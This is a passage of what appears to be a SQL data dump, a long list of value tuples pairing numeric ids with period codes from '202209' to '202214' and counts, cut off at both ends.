,1,'202209',8),(4514,1,'202209',8),(4517,1,'202209',8),(4520,1,'202209',8),(470,1,'202209',9),(487,1,'202209',9),(570,1,'202209',9),(1612,1,'202209',9),(1614,1,'202209',9),(1722,1,'202209',9),(1737,1,'202209',9),(1776,1,'202209',9),(2148,1,'202209',9),(2297,1,'202209',9),(2704,1,'202209',9),(3060,1,'202209',9),(3107,1,'202209',9),(3742,1,'202209',9),(4551,1,'202209',9),(87,1,'202209',10),(468,1,'202209',10),(2457,1,'202209',10),(2813,1,'202209',10),(3041,1,'202209',10),(3117,1,'202209',10),(3127,1,'202209',10),(3253,1,'202209',10),(4400,1,'202209',10),(4412,1,'202209',10),(4529,1,'202209',10),(84,1,'202209',11),(335,1,'202209',11),(1720,1,'202209',11),(2751,1,'202209',11),(2809,1,'202209',11),(3006,1,'202209',11),(4326,1,'202209',11),(108,1,'202209',12),(471,1,'202209',12),(1588,1,'202209',12),(1606,1,'202209',12),(2159,1,'202209',12),(473,1,'202209',13),(3764,1,'202209',13),(3781,1,'202209',13),(4524,1,'202209',13),(1582,1,'202209',14),(1596,1,'202209',14),(4566,1,'202209',14),(2503,1,'202209',15),(469,1,'202209',17),(3069,1,'202209',17),(4341,1,'202209',17),(1598,1,'202209',18),(1608,1,'202209',18),(2769,1,'202209',18),(76,1,'202209',19),(89,1,'202209',19),(2309,1,'202209',19),(4457,1,'202209',19),(1594,1,'202209',23),(2904,1,'202209',23),(91,1,'202209',24),(1602,1,'202209',26),(68,1,'202209',29),(4582,1,'202209',29),(1600,1,'202209',35),(1586,1,'202209',37),(72,1,'202209',39),(80,1,'202209',52),(9,1,'202209',603),(110,1,'202210',1),(106,1,'202210',2),(480,1,'202210',2),(482,1,'202210',2),(483,1,'202210',2),(1718,1,'202210',2),(1726,1,'202210',2),(1739,1,'202210',2),(1749,1,'202210',2),(2063,1,'202210',2),(2178,1,'202210',2),(3092,1,'202210',2),(3247,1,'202210',2),(3265,1,'202210',2),(3267,1,'202210',2),(3271,1,'202210',2),(467,1,'202210',3),(481,1,'202210',3),(484,1,'202210',3),(485,1,'202210',3),(487,1,'202210',3),(1699,1,'202210',3),(1701,1,'202210',3),(1703,1,'202210',3),(1705,1,'202210',3),(1707,1,'202210',3),(1724,1,'202210',3),(1730,1,'202210',3),(1743,1,'202210',3),(1745,1,'202210',3),(1751,1,'202210',3),(1780,1,'202210',3),(2154,1,'202210',3),(2165,1,'202210',3),(2293,1,'202210',3),(2617,1,'202210',3),(3097,1,'202210',3),(3109,1,'202210',3),(3243,1,'202210',3),(3245,1,'202210',3),(3259,1,'202210',3),(3261,1,'202210',3),(3273,1,'202210',3),(3275,1,'202210',3),(3489,1,'202210',3),(3710,1,'202210',3),(3724,1,'202210',3),(3735,1,'202210',3),(3746,1,'202210',3),(3774,1,'202210',3),(4301,1,'202210',3),(4357,1,'202210',3),(4368,1,'202210',3),(4373,1,'202210',3),(4382,1,'202210',3),(4408,1,'202210',3),(4436,1,'202210',3),(4440,1,'202210',3),(4551,1,'202210',3),(102,1,'202210',4),(468,1,'202210',4),(470,1,'202210',4),(478,1,'202210',4),(1590,1,'202210',4),(1592,1,'202210',4),(1614,1,'202210',4),(1697,1,'202210',4),(1709,1,'202210',4),(1715,1,'202210',4),(1722,1,'202210',4),(1734,1,'202210',4),(1741,1,'202210',4),(1747,1,'202210',4),(1772,1,'202210',4),(1776,1,'202210',4),(1782,1,'202210',4),(2161,1,'202210',4),(2252,1,'202210',4),(2609,1,'202210',4),(2658,1,'202210',4),(2751,1,'202210',4),(2956,1,'202210',4),(2964,1,'202210',4),(2965,1,'202210',4),(2989,1,'202210',4),(2993,1,'202210',4),(3027,1,'202210',4),(3087,1,'202210',4),(3096,1,'202210',4),(3263,1,'202210',4),(3269,1,'202210',4),(3278,1,'202210',4),(3307,1,'202210',4),(3430,1,'202210',4),(3531,1,'202210',4),(3534,1,'202210',4),(3541,1,'202210',4),(3727,1,'202210',4),(3731,1,'202210',4),(3738,1,'202210',4),(3749,1,'202210',4),(3752,1,'202210',4),(4275,1,'202210',4),(4387,1,'202210',4),(4396,1,'202210',4),(4404,1,'202210',4),(4432,1,'202210',4),(4454,1,'202210',4),(4542,1,'202210',4),(4546,1,'202210',4),(74,1,'202210',5),(472,1,'202210',5),(474,1,'202210',5),(476,1,'202210',5),(477,1,'202210',5),(486,1,'202210',5),(488,1,'202210',5),(1610,1,'202210',5),(1695,1,'202210',5),(1720,1,'202210',5),(1768,1,'202210',5),(1770,1,'202210',5),(1774,1,'202210',5),(1778,1,'202210',5),(2152,1,'202210',5),(2156,1,'202210',5),(2248,1,'202210',5),(2296,1,'202210',5),(2297,1,'202210',5),(2503,1,'202210',5),(2748,1,'202210',5),(3006,1,'202210',5),(3023,1,'202210',5),(3034,1,'202210',5),(3045,1,'202210',5),(3079,1,'202210',5),(3102,1,'202210',5),(3104,1,'202210',5),(3229,1,'202210',5),(3249,1,'202210',5),(3257,1,'202210',5),(3280,1,'202210',5),(3287,1,'202210',5),(3297,1,'202210',5),(3438,1,'202210',5),(3482,1,'202210',5),(3714,1,'202210',5),(3721,1,'202210',5),(3764,1,'202210',5),(3771,1,'202210',5),(4323,1,'202210',5),(4338,1,'202210',5),(4363,1,'202210',5),(4391,1,'202210',5),(4420,1,'202210',5),(4517,1,'202210',5),(4556,1,'202210',5),(91,1,'202210',6),(335,1,'202210',6),(473,1,'202210',6),(1584,1,'202210',6),(1711,1,'202210',6),(1713,1,'202210',6),(1737,1,'202210',6),(1766,1,'202210',6),(2159,1,'202210',6),(2457,1,'202210',6),(2558,1,'202210',6),(2775,1,'202210',6),(2804,1,'202210',6),(3005,1,'202210',6),(3038,1,'202210',6),(3066,1,'202210',6),(3107,1,'202210',6),(3124,1,'202210',6),(3226,1,'202210',6),(3240,1,'202210',6),(3253,1,'202210',6),(3285,1,'202210',6),(3486,1,'202210',6),(3498,1,'202210',6),(3777,1,'202210',6),(4329,1,'202210',6),(4332,1,'202210',6),(4341,1,'202210',6),(4412,1,'202210',6),(4424,1,'202210',6),(4448,1,'202210',6),(84,1,'202210',7),(108,1,'202210',7),(471,1,'202210',7),(479,1,'202210',7),(570,1,'202210',7),(1604,1,'202210',7),(1728,1,'202210',7),(2150,1,'202210',7),(2704,1,'202210',7),(2769,1,'202210',7),(2911,1,'202210',7),(2991,1,'202210',7),(3004,1,'202210',7),(3083,1,'202210',7),(3090,1,'202210',7),(3290,1,'202210',7),(4238,1,'202210',7),(469,1,'202210',8),(1732,1,'202210',8),(2148,1,'202210',8),(3063,1,'202210',8),(3072,1,'202210',8),(3117,1,'202210',8),(3282,1,'202210',8),(3479,1,'202210',8),(4377,1,'202210',8),(4416,1,'202210',8),(4514,1,'202210',8),(4520,1,'202210',8),(4529,1,'202210',8),(76,1,'202210',9),(3041,1,'202210',9),(3060,1,'202210',9),(3127,1,'202210',9),(3313,1,'202210',9),(3742,1,'202210',9),(3781,1,'202210',9),(1596,1,'202210',10),(4326,1,'202210',10),(4335,1,'202210',10),(4428,1,'202210',10),(1582,1,'202210',11),(1612,1,'202210',11),(3316,1,'202210',11),(4566,1,'202210',11),(2801,1,'202210',12),(2813,1,'202210',12),(4524,1,'202210',12),(87,1,'202210',13),(89,1,'202210',13),(2309,1,'202210',13),(4400,1,'202210',13),(4444,1,'202210',13),(1588,1,'202210',14),(2809,1,'202210',14),(4457,1,'202210',14),(1606,1,'202210',15),(3030,1,'202210',16),(4582,1,'202210',17),(1544,1,'202210',19),(3069,1,'202210',19),(3251,1,'202210',19),(1598,1,'202210',20),(68,1,'202210',21),(1594,1,'202210',24),(1608,1,'202210',24),(1602,1,'202210',30),(72,1,'202210',31),(1600,1,'202210',35),(80,1,'202210',39),(1586,1,'202210',43),(2904,1,'202210',46),(9,1,'202210',635),(476,1,'202211',1),(1705,1,'202211',1),(1707,1,'202211',1),(1722,1,'202211',1),(1728,1,'202211',1),(1734,1,'202211',1),(1768,1,'202211',1),(2748,1,'202211',1),(3005,1,'202211',1),(3087,1,'202211',1),(3247,1,'202211',1),(3249,1,'202211',1),(3259,1,'202211',1),(3263,1,'202211',1),(3273,1,'202211',1),(3721,1,'202211',1),(3727,1,'202211',1),(1592,1,'202211',2),(1699,1,'202211',2),(1730,1,'202211',2),(1741,1,'202211',2),(1766,1,'202211',2),(1780,1,'202211',2),(2152,1,'202211',2),(2156,1,'202211',2),(2293,1,'202211',2),(2617,1,'202211',2),(2964,1,'202211',2),(2991,1,'202211',2),(3034,1,'202211',2),(3083,1,'202211',2),(3092,1,'202211',2),(3096,1,'202211',2),(3107,1,'202211',2),(3109,1,'202211',2),(3240,1,'202211',2),(3265,1,'202211',2),(3269,1,'202211',2),(3275,1,'202211',2),(4332,1,'202211',2),(4363,1,'202211',2),(4377,1,'202211',2),(4387,1,'202211',2),(4408,1,'202211',2),(4424,1,'202211',2),(4444,1,'202211',2),(4556,1,'202211',2),(4587,1,'202211',2),(4591,1,'202211',2),(102,1,'202211',3),(480,1,'202211',3),(481,1,'202211',3),(482,1,'202211',3),(483,1,'202211',3),(484,1,'202211',3),(487,1,'202211',3),(488,1,'202211',3),(570,1,'202211',3),(1697,1,'202211',3),(1709,1,'202211',3),(1711,1,'202211',3),(1713,1,'202211',3),(1715,1,'202211',3),(1726,1,'202211',3),(1737,1,'202211',3),(1739,1,'202211',3),(1743,1,'202211',3),(1751,1,'202211',3),(1774,1,'202211',3),(1776,1,'202211',3),(1782,1,'202211',3),(2154,1,'202211',3),(2161,1,'202211',3),(2248,1,'202211',3),(2252,1,'202211',3),(3041,1,'202211',3),(3097,1,'202211',3),(3229,1,'202211',3),(3243,1,'202211',3),(3251,1,'202211',3),(3257,1,'202211',3),(3261,1,'202211',3),(3280,1,'202211',3),(3287,1,'202211',3),(3438,1,'202211',3),(3498,1,'202211',3),(3541,1,'202211',3),(3714,1,'202211',3),(3738,1,'202211',3),(3742,1,'202211',3),(3749,1,'202211',3),(4238,1,'202211',3),(4275,1,'202211',3),(4412,1,'202211',3),(4428,1,'202211',3),(4436,1,'202211',3),(467,1,'202211',4),(470,1,'202211',4),(472,1,'202211',4),(478,1,'202211',4),(1584,1,'202211',4),(1701,1,'202211',4),(1703,1,'202211',4),(1720,1,'202211',4),(1747,1,'202211',4),(1749,1,'202211',4),(2063,1,'202211',4),(2165,1,'202211',4),(2178,1,'202211',4),(2965,1,'202211',4),(2989,1,'202211',4),(2993,1,'202211',4),(3006,1,'202211',4),(3038,1,'202211',4),(3072,1,'202211',4),(3127,1,'202211',4),(3226,1,'202211',4),(3245,1,'202211',4),(3271,1,'202211',4),(3313,1,'202211',4),(3430,1,'202211',4),(3486,1,'202211',4),(3489,1,'202211',4),(3531,1,'202211',4),(3710,1,'202211',4),(4357,1,'202211',4),(4368,1,'202211',4),(4382,1,'202211',4),(4391,1,'202211',4),(4396,1,'202211',4),(4404,1,'202211',4),(4432,1,'202211',4),(4440,1,'202211',4),(4448,1,'202211',4),(74,1,'202211',5),(108,1,'202211',5),(474,1,'202211',5),(1590,1,'202211',5),(1718,1,'202211',5),(1724,1,'202211',5),(1732,1,'202211',5),(1745,1,'202211',5),(1778,1,'202211',5),(2148,1,'202211',5),(2296,1,'202211',5),(2658,1,'202211',5),(2775,1,'202211',5),(2804,1,'202211',5),(3023,1,'202211',5),(3063,1,'202211',5),(3066,1,'202211',5),(3102,1,'202211',5),(3104,1,'202211',5),(3267,1,'202211',5),(3290,1,'202211',5),(3297,1,'202211',5),(3316,1,'202211',5),(3482,1,'202211',5),(3534,1,'202211',5),(3735,1,'202211',5),(3752,1,'202211',5),(3771,1,'202211',5),(4326,1,'202211',5),(4341,1,'202211',5),(4373,1,'202211',5),(4420,1,'202211',5),(468,1,'202211',6),(471,1,'202211',6),(473,1,'202211',6),(479,1,'202211',6),(486,1,'202211',6),(1695,1,'202211',6),(2558,1,'202211',6),(2704,1,'202211',6),(2813,1,'202211',6),(2956,1,'202211',6),(3079,1,'202211',6),(3117,1,'202211',6),(3124,1,'202211',6),(3278,1,'202211',6),(3285,1,'202211',6),(3479,1,'202211',6),(3731,1,'202211',6),(3774,1,'202211',6),(3777,1,'202211',6),(4301,1,'202211',6),(4323,1,'202211',6),(4338,1,'202211',6),(4400,1,'202211',6),(4454,1,'202211',6),(4546,1,'202211',6),(4566,1,'202211',6),(84,1,'202211',7),(2150,1,'202211',7),(2457,1,'202211',7),(2503,1,'202211',7),(2609,1,'202211',7),(2751,1,'202211',7),(3090,1,'202211',7),(3282,1,'202211',7),(3307,1,'202211',7),(3746,1,'202211',7),(3764,1,'202211',7),(4329,1,'202211',7),(4416,1,'202211',7),(4551,1,'202211',7),(335,1,'202211',8),(469,1,'202211',8),(485,1,'202211',8),(1596,1,'202211',8),(1604,1,'202211',8),(1610,1,'202211',8),(1614,1,'202211',8),(1770,1,'202211',8),(1772,1,'202211',8),(2911,1,'202211',8),(3027,1,'202211',8),(3045,1,'202211',8),(3724,1,'202211',8),(477,1,'202211',9),(1612,1,'202211',9),(2159,1,'202211',9),(2769,1,'202211',9),(3781,1,'202211',9),(4514,1,'202211',9),(4517,1,'202211',9),(4542,1,'202211',9),(2801,1,'202211',10),(4335,1,'202211',10),(87,1,'202211',11),(2297,1,'202211',11),(3060,1,'202211',11),(4520,1,'202211',11),(76,1,'202211',12),(1606,1,'202211',12),(3004,1,'202211',12),(4529,1,'202211',12),(1588,1,'202211',13),(4524,1,'202211',13),(68,1,'202211',14),(91,1,'202211',14),(4582,1,'202211',14),(1602,1,'202211',15),(2309,1,'202211',15),(2809,1,'202211',15),(1582,1,'202211',16),(1608,1,'202211',16),(4457,1,'202211',16),(89,1,'202211',17),(1594,1,'202211',17),(3069,1,'202211',17),(1598,1,'202211',18),(3030,1,'202211',22),(1544,1,'202211',26),(1600,1,'202211',31),(72,1,'202211',35),(2904,1,'202211',35),(80,1,'202211',36),(1586,1,'202211',37),(9,1,'202211',589),(110,1,'202212',1),(3297,1,'202212',2),(1715,1,'202212',3),(1780,1,'202212',3),(2296,1,'202212',3),(2748,1,'202212',3),(2804,1,'202212',3),(3079,1,'202212',3),(3096,1,'202212',3),(3229,1,'202212',3),(3249,1,'202212',3),(3253,1,'202212',3),(3257,1,'202212',3),(3261,1,'202212',3),(3265,1,'202212',3),(3275,1,'202212',3),(3280,1,'202212',3),(3290,1,'202212',3),(4357,1,'202212',3),(4363,1,'202212',3),(102,1,'202212',4),(1703,1,'202212',4),(1707,1,'202212',4),(1709,1,'202212',4),(1718,1,'202212',4),(1720,1,'202212',4),(1722,1,'202212',4),(1726,1,'202212',4),(1749,1,'202212',4),(1770,1,'202212',4),(1776,1,'202212',4),(1782,1,'202212',4),(2150,1,'202212',4),(2156,1,'202212',4),(2161,1,'202212',4),(2248,1,'202212',4),(2252,1,'202212',4),(2293,1,'202212',4),(2991,1,'202212',4),(3087,1,'202212',4),(3092,1,'202212',4),(3102,1,'202212',4),(3109,1,'202212',4),(3243,1,'202212',4),(3245,1,'202212',4),(3247,1,'202212',4),(3263,1,'202212',4),(3271,1,'202212',4),(3278,1,'202212',4),(3285,1,'202212',4),(3534,1,'202212',4),(3727,1,'202212',4),(4428,1,'202212',4),(74,1,'202212',5),(478,1,'202212',5),(480,1,'202212',5),(1604,1,'202212',5),(1612,1,'202212',5),(1697,1,'202212',5),(1699,1,'202212',5),(1713,1,'202212',5),(1728,1,'202212',5),(1730,1,'202212',5),(1737,1,'202212',5),(1739,1,'202212',5),(1745,1,'202212',5),(1747,1,'202212',5),(1772,1,'202212',5),(1774,1,'202212',5),(2152,1,'202212',5),(2154,1,'202212',5),(2165,1,'202212',5),(2297,1,'202212',5),(2911,1,'202212',5),(2965,1,'202212',5),(2993,1,'202212',5),(3005,1,'202212',5),(3034,1,'202212',5),(3041,1,'202212',5),(3083,1,'202212',5),(3107,1,'202212',5),(3226,1,'202212',5),(3240,1,'202212',5),(3259,1,'202212',5),(3287,1,'202212',5),(3438,1,'202212',5),(3541,1,'202212',5),(3731,1,'202212',5),(3735,1,'202212',5),(3738,1,'202212',5),(4238,1,'202212',5),(4338,1,'202212',5),(4341,1,'202212',5),(4546,1,'202212',5),(472,1,'202212',6),(474,1,'202212',6),(476,1,'202212',6),(481,1,'202212',6),(483,1,'202212',6),(484,1,'202212',6),(485,1,'202212',6),(1732,1,'202212',6),(1734,1,'202212',6),(1743,1,'202212',6),(1751,1,'202212',6),(2063,1,'202212',6),(2178,1,'202212',6),(2558,1,'202212',6),(2751,1,'202212',6),(2956,1,'202212',6),(3038,1,'202212',6),(3097,1,'202212',6),(3124,1,'202212',6),(3267,1,'202212',6),(3269,1,'202212',6),(3273,1,'202212',6),(3307,1,'202212',6),(3313,1,'202212',6),(3482,1,'202212',6),(3489,1,'202212',6),(3714,1,'202212',6),(3749,1,'202212',6),(4301,1,'202212',6),(4323,1,'202212',6),(4326,1,'202212',6),(4368,1,'202212',6),(4377,1,'202212',6),(4382,1,'202212',6),(4416,1,'202212',6),(4424,1,'202212',6),(4448,1,'202212',6),(4454,1,'202212',6),(471,1,'202212',7),(479,1,'202212',7),(488,1,'202212',7),(570,1,'202212',7),(1584,1,'202212',7),(1590,1,'202212',7),(1695,1,'202212',7),(1705,1,'202212',7),(1711,1,'202212',7),(1724,1,'202212',7),(1768,1,'202212',7),(2148,1,'202212',7),(2769,1,'202212',7),(2775,1,'202212',7),(2809,1,'202212',7),(2964,1,'202212',7),(2989,1,'202212',7),(3004,1,'202212',7),(3006,1,'202212',7),(3063,1,'202212',7),(3069,1,'202212',7),(3072,1,'202212',7),(3090,1,'202212',7),(3251,1,'202212',7),(3282,1,'202212',7),(3430,1,'202212',7),(3498,1,'202212',7),(3721,1,'202212',7),(3724,1,'202212',7),(3777,1,'202212',7),(4275,1,'202212',7),(4329,1,'202212',7),(4335,1,'202212',7),(4373,1,'202212',7),(4387,1,'202212',7),(4396,1,'202212',7),(4408,1,'202212',7),(4432,1,'202212',7),(4517,1,'202212',7),(4556,1,'202212',7),(467,1,'202212',8),(469,1,'202212',8),(470,1,'202212',8),(477,1,'202212',8),(482,1,'202212',8),(487,1,'202212',8),(1596,1,'202212',8),(1610,1,'202212',8),(1701,1,'202212',8),(1778,1,'202212',8),(2159,1,'202212',8),(2658,1,'202212',8),(2704,1,'202212',8),(2801,1,'202212',8),(3027,1,'202212',8),(3066,1,'202212',8),(3479,1,'202212',8),(3486,1,'202212',8),(3710,1,'202212',8),(3742,1,'202212',8),(3771,1,'202212',8),(4412,1,'202212',8),(4436,1,'202212',8),(486,1,'202212',9),(1592,1,'202212',9),(1608,1,'202212',9),(1766,1,'202212',9),(2617,1,'202212',9),(3045,1,'202212',9),(3531,1,'202212',9),(3774,1,'202212',9),(3781,1,'202212',9),(4332,1,'202212',9),(4400,1,'202212',9),(4440,1,'202212',9),(4444,1,'202212',9),(4514,1,'202212',9),(4529,1,'202212',9),(4542,1,'202212',9),(4551,1,'202212',9),(1741,1,'202212',10),(3023,1,'202212',10),(3316,1,'202212',10),(4391,1,'202212',10),(4420,1,'202212',10),(4566,1,'202212',10),(2609,1,'202212',11),(2813,1,'202212',11),(3060,1,'202212',11),(3752,1,'202212',11),(4404,1,'202212',11),(4524,1,'202212',11),(4587,1,'202212',11),(473,1,'202212',12),(1588,1,'202212',12),(3746,1,'202212',12),(4591,1,'202212',12),(335,1,'202212',13),(468,1,'202212',13),(1582,1,'202212',13),(1614,1,'202212',13),(3764,1,'202212',13),(2503,1,'202212',14),(3104,1,'202212',14),(3117,1,'202212',14),(4520,1,'202212',14),(84,1,'202212',15),(108,1,'202212',15),(3127,1,'202212',15),(91,1,'202212',16),(87,1,'202212',18),(1598,1,'202212',18),(2457,1,'202212',18),(1594,1,'202212',19),(76,1,'202212',20),(1606,1,'202212',20),(4457,1,'202212',20),(2309,1,'202212',22),(89,1,'202212',23),(1544,1,'202212',23),(1602,1,'202212',23),(1600,1,'202212',25),(72,1,'202212',27),(4582,1,'202212',27),(68,1,'202212',28),(1586,1,'202212',32),(3030,1,'202212',32),(2904,1,'202212',52),(80,1,'202212',56),(9,1,'202212',573),(467,1,'202213',1),(479,1,'202213',1),(482,1,'202213',1),(488,1,'202213',1),(1705,1,'202213',1),(1720,1,'202213',1),(1732,1,'202213',1),(1737,1,'202213',1),(1751,1,'202213',1),(1776,1,'202213',1),(2063,1,'202213',1),(2150,1,'202213',1),(2152,1,'202213',1),(2248,1,'202213',1),(2293,1,'202213',1),(2617,1,'202213',1),(2748,1,'202213',1),(2801,1,'202213',1),(2965,1,'202213',1),(2991,1,'202213',1),(2993,1,'202213',1),(3079,1,'202213',1),(3243,1,'202213',1),(3245,1,'202213',1),(3259,1,'202213',1),(3269,1,'202213',1),(3271,1,'202213',1),(3316,1,'202213',1),(3498,1,'202213',1),(3531,1,'202213',1),(3710,1,'202213',1),(3721,1,'202213',1),(3727,1,'202213',1),(3764,1,'202213',1),(3777,1,'202213',1),(4275,1,'202213',1),(4357,1,'202213',1),(4363,1,'202213',1),(4377,1,'202213',1),(4420,1,'202213',1),(4436,1,'202213',1),(4440,1,'202213',1),(4514,1,'202213',1),(4556,1,'202213',1),(4591,1,'202213',1),(84,1,'202213',2),(110,1,'202213',2),(471,1,'202213',2),(473,1,'202213',2),(477,1,'202213',2),(481,1,'202213',2),(483,1,'202213',2),(486,1,'202213',2),(1584,1,'202213',2),(1707,1,'202213',2),(1713,1,'202213',2),(1715,1,'202213',2),(1730,1,'202213',2),(1739,1,'202213',2),(1768,1,'202213',2),(2154,1,'202213',2),(2161,1,'202213',2),(2457,1,'202213',2),(2658,1,'202213',2),(2964,1,'202213',2),(3023,1,'202213',2),(3034,1,'202213',2),(3092,1,'202213',2),(3096,1,'202213',2),(3124,1,'202213',2),(3247,1,'202213',2),(3257,1,'202213',2),(3265,1,'202213',2),(3273,1,'202213',2),(3285,1,'202213',2),(3287,1,'202213',2),(3313,1,'202213',2),(3482,1,'202213',2),(3541,1,'202213',2),(3714,1,'202213',2),(3731,1,'202213',2),(4301,1,'202213',2),(4326,1,'202213',2),(4329,1,'202213',2),(4332,1,'202213',2),(4335,1,'202213',2),(4341,1,'202213',2),(4368,1,'202213',2),(4382,1,'202213',2),(4400,1,'202213',2),(4444,1,'202213',2),(4448,1,'202213',2),(4546,1,'202213',2),(4551,1,'202213',2),(4587,1,'202213',2),(108,1,'202213',3),(468,1,'202213',3),(470,1,'202213',3),(474,1,'202213',3),(476,1,'202213',3),(485,1,'202213',3),(1590,1,'202213',3),(1699,1,'202213',3),(1709,1,'202213',3),(1711,1,'202213',3),(1726,1,'202213',3),(1741,1,'202213',3),(1743,1,'202213',3),(1770,1,'202213',3),(1772,1,'202213',3),(1774,1,'202213',3),(1778,1,'202213',3),(1780,1,'202213',3),(2178,1,'202213',3),(2558,1,'202213',3),(2775,1,'202213',3),(2809,1,'202213',3),(2813,1,'202213',3),(2911,1,'202213',3),(2956,1,'202213',3),(3005,1,'202213',3),(3027,1,'202213',3),(3038,1,'202213',3),(3041,1,'202213',3),(3102,1,'202213',3),(3107,1,'202213',3),(3117,1,'202213',3),(3240,1,'202213',3),(3261,1,'202213',3),(3263,1,'202213',3),(3267,1,'202213',3),(3275,1,'202213',3),(3280,1,'202213',3),(3290,1,'202213',3),(3297,1,'202213',3),(3307,1,'202213',3),(3430,1,'202213',3),(3438,1,'202213',3),(3534,1,'202213',3),(3735,1,'202213',3),(4338,1,'202213',3),(4387,1,'202213',3),(4424,1,'202213',3),(4428,1,'202213',3),(4432,1,'202213',3),(4454,1,'202213',3),(472,1,'202213',4),(1701,1,'202213',4),(1718,1,'202213',4),(1724,1,'202213',4),(1749,1,'202213',4),(1782,1,'202213',4),(2148,1,'202213',4),(2297,1,'202213',4),(2751,1,'202213',4),(2804,1,'202213',4),(3063,1,'202213',4),(3087,1,'202213',4),(3229,1,'202213',4),(3249,1,'202213',4),(3278,1,'202213',4),(3489,1,'202213',4),(3724,1,'202213',4),(3742,1,'202213',4),(3746,1,'202213',4),(3749,1,'202213',4),(3771,1,'202213',4),(4408,1,'202213',4),(4412,1,'202213',4),(4416,1,'202213',4),(4517,1,'202213',4),(4524,1,'202213',4),(74,1,'202213',5),(335,1,'202213',5),(1610,1,'202213',5),(1697,1,'202213',5),(2165,1,'202213',5),(3006,1,'202213',5),(3060,1,'202213',5),(3090,1,'202213',5),(3097,1,'202213',5),(3109,1,'202213',5),(3251,1,'202213',5),(3253,1,'202213',5),(3282,1,'202213',5),(3486,1,'202213',5),(4238,1,'202213',5),(4373,1,'202213',5),(4404,1,'202213',5),(87,1,'202213',6),(469,1,'202213',6),(487,1,'202213',6),(1722,1,'202213',6),(2296,1,'202213',6),(2503,1,'202213',6),(2704,1,'202213',6),(3069,1,'202213',6),(3072,1,'202213',6),(3226,1,'202213',6),(3479,1,'202213',6),(4391,1,'202213',6),(4542,1,'202213',6),(89,1,'202213',7),(1604,1,'202213',7),(1608,1,'202213',7),(1766,1,'202213',7),(3004,1,'202213',7),(3083,1,'202213',7),(3104,1,'202213',7),(4529,1,'202213',7),(4566,1,'202213',7),(1598,1,'202213',8),(1606,1,'202213',8),(2159,1,'202213',8),(3045,1,'202213',8),(4520,1,'202213',8),(91,1,'202213',9),(1592,1,'202213',9),(1596,1,'202213',9),(2989,1,'202213',9),(4457,1,'202213',9),(76,1,'202213',10),(570,1,'202213',10),(1728,1,'202213',10),(2609,1,'202213',10),(2769,1,'202213',10),(3127,1,'202213',10),(3752,1,'202213',10),(72,1,'202213',11),(1582,1,'202213',13),(4582,1,'202213',13),(68,1,'202213',14),(1614,1,'202213',14),(1612,1,'202213',15),(1594,1,'202213',16),(1600,1,'202213',16),(1602,1,'202213',16),(2309,1,'202213',16),(3781,1,'202213',17),(1588,1,'202213',18),(1544,1,'202213',33),(2904,1,'202213',38),(1586,1,'202213',47),(3030,1,'202213',53),(80,1,'202213',57),(9,1,'202213',569),(106,1,'202214',1),(1776,1,'202214',2),(1782,1,'202214',2),(3271,1,'202214',2),(1699,1,'202214',3),(1705,1,'202214',3),(1707,1,'202214',3),(1737,1,'202214',3),(1739,1,'202214',3),(1780,1,'202214',3),(2293,1,'202214',3),(3109,1,'202214',3),(3249,1,'202214',3),(3261,1,'202214',3),(3273,1,'202214',3),(4428,1,'202214',3),(102,1,'202214',4),(1720,1,'202214',4),(1724,1,'202214',4),(1743,1,'202214',4),(2159,1,'202214',4),(2248,1,'202214',4),(2748,1,'202214',4),(3041,1,'202214',4),(3092,1,'202214',4),(3096,1,'202214',4),(3229,1,'202214',4),(3240,1,'202214',4),(3245,1,'202214',4),(3247,1,'202214',4),(3253,1,'202214',4),(3257,1,'202214',4),(3263,1,'202214',4),(3267,1,'202214',4),(3714,1,'202214',4),(468,1,'202214',5),(473,1,'202214',5),(476,1,'202214',5),(485,1,'202214',5),(1590,1,'202214',5),(1695,1,'202214',5),(1713,1,'202214',5),(1718,1,'202214',5),(1726,1,'202214',5),(1730,1,'202214',5),(1732,1,'202214',5),(1734,1,'202214',5),(1747,1,'202214',5),(1749,1,'202214',5),(1751,1,'202214',5),(1768,1,'202214',5),(1772,1,'202214',5),(2148,1,'202214',5),(2150,1,'202214',5),(2252,1,'202214',5),(2297,1,'202214',5),(2658,1,'202214',5),(2801,1,'202214',5),(2993,1,'202214',5),(3072,1,'202214',5),(3087,1,'202214',5),(3251,1,'202214',5),(3259,1,'202214',5),(3265,1,'202214',5),(3275,1,'202214',5),(3280,1,'202214',5),(3486,1,'202214',5),(3727,1,'202214',5),(3749,1,'202214',5),(4326,1,'202214',5),(4363,1,'202214',5),(4373,1,'202214',5),(4387,1,'202214',5),(4424,1,'202214',5),(4444,1,'202214',5),(4514,1,'202214',5),(471,1,'202214',6),(474,1,'202214',6),(481,1,'202214',6),(484,1,'202214',6),(486,1,'202214',6),(488,1,'202214',6),(1592,1,'202214',6),(1697,1,'202214',6),(1701,1,'202214',6),(1703,1,'202214',6),(1709,1,'202214',6),(1745,1,'202214',6),(2152,1,'202214',6),(2154,1,'202214',6),(2156,1,'202214',6),(2965,1,'202214',6),(2991,1,'202214',6),(3023,1,'202214',6),(3066,1,'202214',6),(3083,1,'202214',6),(3090,1,'202214',6),(3117,1,'202214',6),(3124,1,'202214',6),(3243,1,'202214',6),(3269,1,'202214',6),(3282,1,'202214',6),(3285,1,'202214',6),(3287,1,'202214',6),(3307,1,'202214',6),(3489,1,'202214',6),(3541,1,'202214',6),(3735,1,'202214',6),(4238,1,'202214',6),(4332,1,'202214',6),(4368,1,'202214',6),(4377,1,'202214',6),(4391,1,'202214',6),(4404,1,'202214',6),(4408,1,'202214',6),(4416,1,'202214',6),(4440,1,'202214',6),(4448,1,'202214',6),(4517,1,'202214',6),(4529,1,'202214',6),(4546,1,'202214',6),(477,1,'202214',7),(478,1,'202214',7),(1608,1,'202214',7),(1614,1,'202214',7),(1715,1,'202214',7),(1766,1,'202214',7),(1774,1,'202214',7),(2063,1,'202214',7),(2704,1,'202214',7),(2751,1,'202214',7),(2775,1,'202214',7),(2809,1,'202214',7),(2813,1,'202214',7),(2911,1,'202214',7),(2956,1,'202214',7),(2964,1,'202214',7),(3005,1,'202214',7),(3006,1,'202214',7),(3034,1,'202214',7),(3097,1,'202214',7),(3102,1,'202214',7),(3226,1,'202214',7),(3721,1,'202214',7),(3731,1,'202214',7),(3738,1,'202214',7),(3742,1,'202214',7),(3771,1,'202214',7),(3774,1,'202214',7),(4329,1,'202214',7),(4382,1,'202214',7),(4400,1,'202214',7),(4420,1,'202214',7),(4432,1,'202214',7),(4436,1,'202214',7),(4551,1,'202214',7),(1610,1,'202214',8),(1711,1,'202214',8),(1741,1,'202214',8),(2161,1,'202214',8),(2178,1,'202214',8),(2617,1,'202214',8),(3027,1,'202214',8),(3079,1,'202214',8),(3107,1,'